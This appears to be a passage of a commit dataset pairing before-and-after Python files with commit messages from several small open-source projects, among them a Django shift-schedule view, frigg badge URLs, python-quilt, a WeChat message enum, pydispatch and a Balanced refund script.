'path': filepath,
}
}
inventory.save_record(meta)
return meta
def get_content(id_, *, offset=0, length=None):
key = b64decode(inventory.get_record(id_)['key'])
return decrypt_blob(id_, key, offset=offset, length=length)
|
421e811242b737a7b1bf27814d70f719f345131b | watchlist/utils.py | watchlist/utils.py | from .models import ShiftSlot, weekday_loc
from website.settings import WORKSHOP_OPEN_DAYS
def get_shift_weekview_rows():
'''Returns a dictionary of shifts for each timeslot, for each weekday'''
slots = ShiftSlot.objects.all()
if not slots:
return None
# Could be troublesome wrt. sorting of dictionary keys. Doesn't *seem* to be an issue right now but it *technically* already is!
rows = {}
for slot in slots:
row_header = '{} -\n{}'.format(slot.start.strftime('%H:%M'), slot.end.strftime('%H:%M'))
if row_header not in rows:
rows[row_header] = []
rows[row_header].append(slot)
# Sort each list in the dict by weekday
for time in rows.keys():
rows[time].sort(key=lambda slot: slot.weekday)
return rows
def get_shift_weekview_columns():
'''Returns a list of weekday name column headers to populate a weekview table with'''
slots = ShiftSlot.objects.all()
if not slots:
return None
cols = []
for slot in slots:
col_header = slot.get_weekday_name()
if col_header not in cols:
cols.append(col_header)
return cols
| from .models import ShiftSlot, weekday_loc
from website.settings import WORKSHOP_OPEN_DAYS
def get_shift_weekview_rows():
    """Return a dict mapping a time-range header to its shifts for a weekview table.

    Keys are '<start> -\\n<end>' strings in chronological order; each value
    is the list of ShiftSlot objects in that time range, sorted by weekday
    so they line up with the day columns. Returns None when no shift slots
    exist.
    """
    # Order by start time so the dict's (insertion-ordered) row headers come
    # out chronologically instead of depending on arbitrary queryset order.
    slots = ShiftSlot.objects.all().order_by('start')
    if not slots:
        return None
    rows = {}
    for slot in slots:
        row_header = '{} -\n{}'.format(slot.start.strftime('%H:%M'), slot.end.strftime('%H:%M'))
        rows.setdefault(row_header, []).append(slot)
    # Sort each row's slots by weekday to match the weekday column order
    for row_slots in rows.values():
        row_slots.sort(key=lambda slot: slot.weekday)
    return rows
def get_shift_weekview_columns():
    """Return the weekday-name column headers for a weekview table.

    Each weekday name appears once, in weekday order; returns None when
    there are no shift slots at all.
    """
    slots = ShiftSlot.objects.all().order_by('weekday')
    if not slots:
        return None
    headers = []
    for day_name in (slot.get_weekday_name() for slot in slots):
        if day_name not in headers:
            headers.append(day_name)
    return headers
| Order weekday columns in watchlist | Order weekday columns in watchlist
| Python | mit | hackerspace-ntnu/website,hackerspace-ntnu/website,hackerspace-ntnu/website | from .models import ShiftSlot, weekday_loc
from website.settings import WORKSHOP_OPEN_DAYS
def get_shift_weekview_rows():
'''Returns a dictionary of shifts for each timeslot, for each weekday'''
slots = ShiftSlot.objects.all()
if not slots:
return None
# Could be troublesome wrt. sorting of dictionary keys. Doesn't *seem* to be an issue right now but it *technically* already is!
rows = {}
for slot in slots:
row_header = '{} -\n{}'.format(slot.start.strftime('%H:%M'), slot.end.strftime('%H:%M'))
if row_header not in rows:
rows[row_header] = []
rows[row_header].append(slot)
# Sort each list in the dict by weekday
for time in rows.keys():
rows[time].sort(key=lambda slot: slot.weekday)
return rows
def get_shift_weekview_columns():
'''Returns a list of weekday name column headers to populate a weekview table with'''
slots = ShiftSlot.objects.all()
if not slots:
return None
cols = []
for slot in slots:
col_header = slot.get_weekday_name()
if col_header not in cols:
cols.append(col_header)
return cols
Order weekday columns in watchlist | from .models import ShiftSlot, weekday_loc
from website.settings import WORKSHOP_OPEN_DAYS
def get_shift_weekview_rows():
'''Returns a dictionary of shifts for each timeslot, for each weekday'''
slots = ShiftSlot.objects.all()
if not slots:
return None
# Could be troublesome wrt. sorting of dictionary keys. Doesn't *seem* to be an issue right now but it *technically* already is!
rows = {}
for slot in slots:
row_header = '{} -\n{}'.format(slot.start.strftime('%H:%M'), slot.end.strftime('%H:%M'))
if row_header not in rows:
rows[row_header] = []
rows[row_header].append(slot)
# Sort each list in the dict by weekday
for time in rows.keys():
rows[time].sort(key=lambda slot: slot.weekday)
return rows
def get_shift_weekview_columns():
'''Returns a list of weekday name column headers to populate a weekview table with'''
slots = ShiftSlot.objects.all().order_by('weekday')
if not slots:
return None
cols = []
for slot in slots:
col_header = slot.get_weekday_name()
if col_header not in cols:
cols.append(col_header)
return cols
| <commit_before>from .models import ShiftSlot, weekday_loc
from website.settings import WORKSHOP_OPEN_DAYS
def get_shift_weekview_rows():
'''Returns a dictionary of shifts for each timeslot, for each weekday'''
slots = ShiftSlot.objects.all()
if not slots:
return None
# Could be troublesome wrt. sorting of dictionary keys. Doesn't *seem* to be an issue right now but it *technically* already is!
rows = {}
for slot in slots:
row_header = '{} -\n{}'.format(slot.start.strftime('%H:%M'), slot.end.strftime('%H:%M'))
if row_header not in rows:
rows[row_header] = []
rows[row_header].append(slot)
# Sort each list in the dict by weekday
for time in rows.keys():
rows[time].sort(key=lambda slot: slot.weekday)
return rows
def get_shift_weekview_columns():
'''Returns a list of weekday name column headers to populate a weekview table with'''
slots = ShiftSlot.objects.all()
if not slots:
return None
cols = []
for slot in slots:
col_header = slot.get_weekday_name()
if col_header not in cols:
cols.append(col_header)
return cols
<commit_msg>Order weekday columns in watchlist<commit_after> | from .models import ShiftSlot, weekday_loc
from website.settings import WORKSHOP_OPEN_DAYS
def get_shift_weekview_rows():
'''Returns a dictionary of shifts for each timeslot, for each weekday'''
slots = ShiftSlot.objects.all()
if not slots:
return None
# Could be troublesome wrt. sorting of dictionary keys. Doesn't *seem* to be an issue right now but it *technically* already is!
rows = {}
for slot in slots:
row_header = '{} -\n{}'.format(slot.start.strftime('%H:%M'), slot.end.strftime('%H:%M'))
if row_header not in rows:
rows[row_header] = []
rows[row_header].append(slot)
# Sort each list in the dict by weekday
for time in rows.keys():
rows[time].sort(key=lambda slot: slot.weekday)
return rows
def get_shift_weekview_columns():
'''Returns a list of weekday name column headers to populate a weekview table with'''
slots = ShiftSlot.objects.all().order_by('weekday')
if not slots:
return None
cols = []
for slot in slots:
col_header = slot.get_weekday_name()
if col_header not in cols:
cols.append(col_header)
return cols
| from .models import ShiftSlot, weekday_loc
from website.settings import WORKSHOP_OPEN_DAYS
def get_shift_weekview_rows():
'''Returns a dictionary of shifts for each timeslot, for each weekday'''
slots = ShiftSlot.objects.all()
if not slots:
return None
# Could be troublesome wrt. sorting of dictionary keys. Doesn't *seem* to be an issue right now but it *technically* already is!
rows = {}
for slot in slots:
row_header = '{} -\n{}'.format(slot.start.strftime('%H:%M'), slot.end.strftime('%H:%M'))
if row_header not in rows:
rows[row_header] = []
rows[row_header].append(slot)
# Sort each list in the dict by weekday
for time in rows.keys():
rows[time].sort(key=lambda slot: slot.weekday)
return rows
def get_shift_weekview_columns():
'''Returns a list of weekday name column headers to populate a weekview table with'''
slots = ShiftSlot.objects.all()
if not slots:
return None
cols = []
for slot in slots:
col_header = slot.get_weekday_name()
if col_header not in cols:
cols.append(col_header)
return cols
Order weekday columns in watchlistfrom .models import ShiftSlot, weekday_loc
from website.settings import WORKSHOP_OPEN_DAYS
def get_shift_weekview_rows():
'''Returns a dictionary of shifts for each timeslot, for each weekday'''
slots = ShiftSlot.objects.all()
if not slots:
return None
# Could be troublesome wrt. sorting of dictionary keys. Doesn't *seem* to be an issue right now but it *technically* already is!
rows = {}
for slot in slots:
row_header = '{} -\n{}'.format(slot.start.strftime('%H:%M'), slot.end.strftime('%H:%M'))
if row_header not in rows:
rows[row_header] = []
rows[row_header].append(slot)
# Sort each list in the dict by weekday
for time in rows.keys():
rows[time].sort(key=lambda slot: slot.weekday)
return rows
def get_shift_weekview_columns():
'''Returns a list of weekday name column headers to populate a weekview table with'''
slots = ShiftSlot.objects.all().order_by('weekday')
if not slots:
return None
cols = []
for slot in slots:
col_header = slot.get_weekday_name()
if col_header not in cols:
cols.append(col_header)
return cols
| <commit_before>from .models import ShiftSlot, weekday_loc
from website.settings import WORKSHOP_OPEN_DAYS
def get_shift_weekview_rows():
'''Returns a dictionary of shifts for each timeslot, for each weekday'''
slots = ShiftSlot.objects.all()
if not slots:
return None
# Could be troublesome wrt. sorting of dictionary keys. Doesn't *seem* to be an issue right now but it *technically* already is!
rows = {}
for slot in slots:
row_header = '{} -\n{}'.format(slot.start.strftime('%H:%M'), slot.end.strftime('%H:%M'))
if row_header not in rows:
rows[row_header] = []
rows[row_header].append(slot)
# Sort each list in the dict by weekday
for time in rows.keys():
rows[time].sort(key=lambda slot: slot.weekday)
return rows
def get_shift_weekview_columns():
'''Returns a list of weekday name column headers to populate a weekview table with'''
slots = ShiftSlot.objects.all()
if not slots:
return None
cols = []
for slot in slots:
col_header = slot.get_weekday_name()
if col_header not in cols:
cols.append(col_header)
return cols
<commit_msg>Order weekday columns in watchlist<commit_after>from .models import ShiftSlot, weekday_loc
from website.settings import WORKSHOP_OPEN_DAYS
def get_shift_weekview_rows():
'''Returns a dictionary of shifts for each timeslot, for each weekday'''
slots = ShiftSlot.objects.all()
if not slots:
return None
# Could be troublesome wrt. sorting of dictionary keys. Doesn't *seem* to be an issue right now but it *technically* already is!
rows = {}
for slot in slots:
row_header = '{} -\n{}'.format(slot.start.strftime('%H:%M'), slot.end.strftime('%H:%M'))
if row_header not in rows:
rows[row_header] = []
rows[row_header].append(slot)
# Sort each list in the dict by weekday
for time in rows.keys():
rows[time].sort(key=lambda slot: slot.weekday)
return rows
def get_shift_weekview_columns():
'''Returns a list of weekday name column headers to populate a weekview table with'''
slots = ShiftSlot.objects.all().order_by('weekday')
if not slots:
return None
cols = []
for slot in slots:
col_header = slot.get_weekday_name()
if col_header not in cols:
cols.append(col_header)
return cols
|
8db252d2980451a3c2107df64c4438de44781eea | frigg/projects/urls.py | frigg/projects/urls.py | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^projects/approve/$', views.approve_projects, name='approve_projects_overview'),
url(r'^projects/approve/(?P<project_id>\d+)/$', views.approve_projects, name='approve_project'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+).svg$', views.build_badge, name='build_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_badge'),
]
| from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^projects/approve/$', views.approve_projects, name='approve_projects_overview'),
url(r'^projects/approve/(?P<project_id>\d+)/$', views.approve_projects, name='approve_project'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+).svg$', views.build_badge, name='build_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/(?P<branch>[^/]+).svg$', views.build_badge,
name='build_branch_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/(?P<branch>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_branch_badge'),
]
| Add support for specifying branch name to svg badges | Add support for specifying branch name to svg badges
| Python | mit | frigg/frigg-hq,frigg/frigg-hq,frigg/frigg-hq | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^projects/approve/$', views.approve_projects, name='approve_projects_overview'),
url(r'^projects/approve/(?P<project_id>\d+)/$', views.approve_projects, name='approve_project'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+).svg$', views.build_badge, name='build_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_badge'),
]
Add support for specifying branch name to svg badges | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^projects/approve/$', views.approve_projects, name='approve_projects_overview'),
url(r'^projects/approve/(?P<project_id>\d+)/$', views.approve_projects, name='approve_project'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+).svg$', views.build_badge, name='build_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/(?P<branch>[^/]+).svg$', views.build_badge,
name='build_branch_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/(?P<branch>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_branch_badge'),
]
| <commit_before>from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^projects/approve/$', views.approve_projects, name='approve_projects_overview'),
url(r'^projects/approve/(?P<project_id>\d+)/$', views.approve_projects, name='approve_project'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+).svg$', views.build_badge, name='build_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_badge'),
]
<commit_msg>Add support for specifying branch name to svg badges<commit_after> | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^projects/approve/$', views.approve_projects, name='approve_projects_overview'),
url(r'^projects/approve/(?P<project_id>\d+)/$', views.approve_projects, name='approve_project'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+).svg$', views.build_badge, name='build_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/(?P<branch>[^/]+).svg$', views.build_badge,
name='build_branch_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/(?P<branch>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_branch_badge'),
]
| from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^projects/approve/$', views.approve_projects, name='approve_projects_overview'),
url(r'^projects/approve/(?P<project_id>\d+)/$', views.approve_projects, name='approve_project'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+).svg$', views.build_badge, name='build_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_badge'),
]
Add support for specifying branch name to svg badgesfrom django.conf.urls import url
from . import views
urlpatterns = [
url(r'^projects/approve/$', views.approve_projects, name='approve_projects_overview'),
url(r'^projects/approve/(?P<project_id>\d+)/$', views.approve_projects, name='approve_project'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+).svg$', views.build_badge, name='build_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/(?P<branch>[^/]+).svg$', views.build_badge,
name='build_branch_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/(?P<branch>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_branch_badge'),
]
| <commit_before>from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^projects/approve/$', views.approve_projects, name='approve_projects_overview'),
url(r'^projects/approve/(?P<project_id>\d+)/$', views.approve_projects, name='approve_project'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+).svg$', views.build_badge, name='build_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_badge'),
]
<commit_msg>Add support for specifying branch name to svg badges<commit_after>from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^projects/approve/$', views.approve_projects, name='approve_projects_overview'),
url(r'^projects/approve/(?P<project_id>\d+)/$', views.approve_projects, name='approve_project'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+).svg$', views.build_badge, name='build_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/(?P<branch>[^/]+).svg$', views.build_badge,
name='build_branch_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/(?P<branch>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_branch_badge'),
]
|
9261db252969c69ede633d4a4c02bb87c7bc1434 | quilt/__init__.py | quilt/__init__.py | # vim: fileencoding=utf-8 et sw=4 ts=4 tw=80:
# python-quilt - A Python implementation of the quilt patch system
#
# Copyright (C) 2012 Björn Ricks <bjoern.ricks@googlemail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
__version_info__ = ("0", "1", "dev1")
__version__ = '.'.join(__version_info__)
| # vim: fileencoding=utf-8 et sw=4 ts=4 tw=80:
# python-quilt - A Python implementation of the quilt patch system
#
# Copyright (C) 2012 Björn Ricks <bjoern.ricks@googlemail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
""" A python implementation of quilt """
__version_info__ = ("0", "1", "dev1")
__version__ = '.'.join(__version_info__)
| Add docstring for main module | Add docstring for main module
| Python | mit | bjoernricks/python-quilt,vadmium/python-quilt | # vim: fileencoding=utf-8 et sw=4 ts=4 tw=80:
# python-quilt - A Python implementation of the quilt patch system
#
# Copyright (C) 2012 Björn Ricks <bjoern.ricks@googlemail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
__version_info__ = ("0", "1", "dev1")
__version__ = '.'.join(__version_info__)
Add docstring for main module | # vim: fileencoding=utf-8 et sw=4 ts=4 tw=80:
# python-quilt - A Python implementation of the quilt patch system
#
# Copyright (C) 2012 Björn Ricks <bjoern.ricks@googlemail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
""" A python implementation of quilt """
__version_info__ = ("0", "1", "dev1")
__version__ = '.'.join(__version_info__)
| <commit_before># vim: fileencoding=utf-8 et sw=4 ts=4 tw=80:
# python-quilt - A Python implementation of the quilt patch system
#
# Copyright (C) 2012 Björn Ricks <bjoern.ricks@googlemail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
__version_info__ = ("0", "1", "dev1")
__version__ = '.'.join(__version_info__)
<commit_msg>Add docstring for main module<commit_after> | # vim: fileencoding=utf-8 et sw=4 ts=4 tw=80:
# python-quilt - A Python implementation of the quilt patch system
#
# Copyright (C) 2012 Björn Ricks <bjoern.ricks@googlemail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
""" A python implementation of quilt """
__version_info__ = ("0", "1", "dev1")
__version__ = '.'.join(__version_info__)
| # vim: fileencoding=utf-8 et sw=4 ts=4 tw=80:
# python-quilt - A Python implementation of the quilt patch system
#
# Copyright (C) 2012 Björn Ricks <bjoern.ricks@googlemail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
__version_info__ = ("0", "1", "dev1")
__version__ = '.'.join(__version_info__)
Add docstring for main module# vim: fileencoding=utf-8 et sw=4 ts=4 tw=80:
# python-quilt - A Python implementation of the quilt patch system
#
# Copyright (C) 2012 Björn Ricks <bjoern.ricks@googlemail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
""" A python implementation of quilt """
__version_info__ = ("0", "1", "dev1")
__version__ = '.'.join(__version_info__)
| <commit_before># vim: fileencoding=utf-8 et sw=4 ts=4 tw=80:
# python-quilt - A Python implementation of the quilt patch system
#
# Copyright (C) 2012 Björn Ricks <bjoern.ricks@googlemail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
__version_info__ = ("0", "1", "dev1")
__version__ = '.'.join(__version_info__)
<commit_msg>Add docstring for main module<commit_after># vim: fileencoding=utf-8 et sw=4 ts=4 tw=80:
# python-quilt - A Python implementation of the quilt patch system
#
# Copyright (C) 2012 Björn Ricks <bjoern.ricks@googlemail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
""" A python implementation of quilt """
__version_info__ = ("0", "1", "dev1")
__version__ = '.'.join(__version_info__)
|
17b3ea3fb2af48aa7680b339bb83cba15f842a83 | classes/wechatMessageType.py | classes/wechatMessageType.py | from enum import Enum
class WechatMessageType(Enum):
TEXT = 1
SYSTEM_MESSAGE = 10000
VOICE = 34
EMOTION = 47
VIDEO = 62
CALL = 50
PICTURE = 3
POSITION = 48
CARD = 42
LINK = 49
UNHANDLED = -999 | from enum import Enum
class WechatMessageType(Enum):
TEXT = 1
SYSTEM_MESSAGE = 10000
VOICE = 34
VIDEO1 = 43
EMOTION = 47
VIDEO2 = 62
CALL = 50
PICTURE = 3
POSITION = 48
CARD = 42
LINK = 49
UNHANDLED = -999 | Support wechat message type 43 | Support wechat message type 43
| Python | apache-2.0 | jambus/wechat-analysis | from enum import Enum
class WechatMessageType(Enum):
TEXT = 1
SYSTEM_MESSAGE = 10000
VOICE = 34
EMOTION = 47
VIDEO = 62
CALL = 50
PICTURE = 3
POSITION = 48
CARD = 42
LINK = 49
UNHANDLED = -999Support wechat message type 43 | from enum import Enum
class WechatMessageType(Enum):
TEXT = 1
SYSTEM_MESSAGE = 10000
VOICE = 34
VIDEO1 = 43
EMOTION = 47
VIDEO2 = 62
CALL = 50
PICTURE = 3
POSITION = 48
CARD = 42
LINK = 49
UNHANDLED = -999 | <commit_before>from enum import Enum
class WechatMessageType(Enum):
TEXT = 1
SYSTEM_MESSAGE = 10000
VOICE = 34
EMOTION = 47
VIDEO = 62
CALL = 50
PICTURE = 3
POSITION = 48
CARD = 42
LINK = 49
UNHANDLED = -999<commit_msg>Support wechat message type 43<commit_after> | from enum import Enum
class WechatMessageType(Enum):
TEXT = 1
SYSTEM_MESSAGE = 10000
VOICE = 34
VIDEO1 = 43
EMOTION = 47
VIDEO2 = 62
CALL = 50
PICTURE = 3
POSITION = 48
CARD = 42
LINK = 49
UNHANDLED = -999 | from enum import Enum
class WechatMessageType(Enum):
TEXT = 1
SYSTEM_MESSAGE = 10000
VOICE = 34
EMOTION = 47
VIDEO = 62
CALL = 50
PICTURE = 3
POSITION = 48
CARD = 42
LINK = 49
UNHANDLED = -999Support wechat message type 43from enum import Enum
class WechatMessageType(Enum):
TEXT = 1
SYSTEM_MESSAGE = 10000
VOICE = 34
VIDEO1 = 43
EMOTION = 47
VIDEO2 = 62
CALL = 50
PICTURE = 3
POSITION = 48
CARD = 42
LINK = 49
UNHANDLED = -999 | <commit_before>from enum import Enum
class WechatMessageType(Enum):
TEXT = 1
SYSTEM_MESSAGE = 10000
VOICE = 34
EMOTION = 47
VIDEO = 62
CALL = 50
PICTURE = 3
POSITION = 48
CARD = 42
LINK = 49
UNHANDLED = -999<commit_msg>Support wechat message type 43<commit_after>from enum import Enum
class WechatMessageType(Enum):
TEXT = 1
SYSTEM_MESSAGE = 10000
VOICE = 34
VIDEO1 = 43
EMOTION = 47
VIDEO2 = 62
CALL = 50
PICTURE = 3
POSITION = 48
CARD = 42
LINK = 49
UNHANDLED = -999 |
a7c1ec51aca74785ac309618f9519d4592953d3f | pydispatch/__init__.py | pydispatch/__init__.py | import pkg_resources
try:
__version__ = pkg_resources.require('python-dispatch')[0].version
except: # pragma: no cover
__version__ = 'unknown'
from pydispatch.dispatch import Dispatcher
from pydispatch.properties import *
| import pkg_resources
try:
__version__ = pkg_resources.require('python-dispatch')[0].version
except: # pragma: no cover
__version__ = 'unknown'
from pydispatch.dispatch import Dispatcher, Event
from pydispatch.properties import *
| Make Event object available at root level import | Make Event object available at root level import
| Python | mit | nocarryr/python-dispatch | import pkg_resources
try:
__version__ = pkg_resources.require('python-dispatch')[0].version
except: # pragma: no cover
__version__ = 'unknown'
from pydispatch.dispatch import Dispatcher
from pydispatch.properties import *
Make Event object available at root level import | import pkg_resources
try:
__version__ = pkg_resources.require('python-dispatch')[0].version
except: # pragma: no cover
__version__ = 'unknown'
from pydispatch.dispatch import Dispatcher, Event
from pydispatch.properties import *
| <commit_before>import pkg_resources
try:
__version__ = pkg_resources.require('python-dispatch')[0].version
except: # pragma: no cover
__version__ = 'unknown'
from pydispatch.dispatch import Dispatcher
from pydispatch.properties import *
<commit_msg>Make Event object available at root level import<commit_after> | import pkg_resources
try:
__version__ = pkg_resources.require('python-dispatch')[0].version
except: # pragma: no cover
__version__ = 'unknown'
from pydispatch.dispatch import Dispatcher, Event
from pydispatch.properties import *
| import pkg_resources
try:
__version__ = pkg_resources.require('python-dispatch')[0].version
except: # pragma: no cover
__version__ = 'unknown'
from pydispatch.dispatch import Dispatcher
from pydispatch.properties import *
Make Event object available at root level importimport pkg_resources
try:
__version__ = pkg_resources.require('python-dispatch')[0].version
except: # pragma: no cover
__version__ = 'unknown'
from pydispatch.dispatch import Dispatcher, Event
from pydispatch.properties import *
| <commit_before>import pkg_resources
try:
__version__ = pkg_resources.require('python-dispatch')[0].version
except: # pragma: no cover
__version__ = 'unknown'
from pydispatch.dispatch import Dispatcher
from pydispatch.properties import *
<commit_msg>Make Event object available at root level import<commit_after>import pkg_resources
try:
__version__ = pkg_resources.require('python-dispatch')[0].version
except: # pragma: no cover
__version__ = 'unknown'
from pydispatch.dispatch import Dispatcher, Event
from pydispatch.properties import *
|
3c4a9c08858378624600a3f64616f03e29d21f31 | actually-do-refunds.py | actually-do-refunds.py | #!/usr/bin/env python -u
from __future__ import absolute_import, division, print_function, unicode_literals
import csv, os, requests
url = 'https://api.balancedpayments.com/debits/{}/refunds'
balanced_api_secret = os.environ['BALANCED_API_SECRET']
inp = csv.reader(open('refunds.csv'))
out = csv.writer(open('refunds.completed.csv', 'w+'))
for ts, id, amount, username, route_id in inp:
response = requests.post( url.format(id)
, data={'amount': amount}
, auth=(balanced_api_secret, '')
)
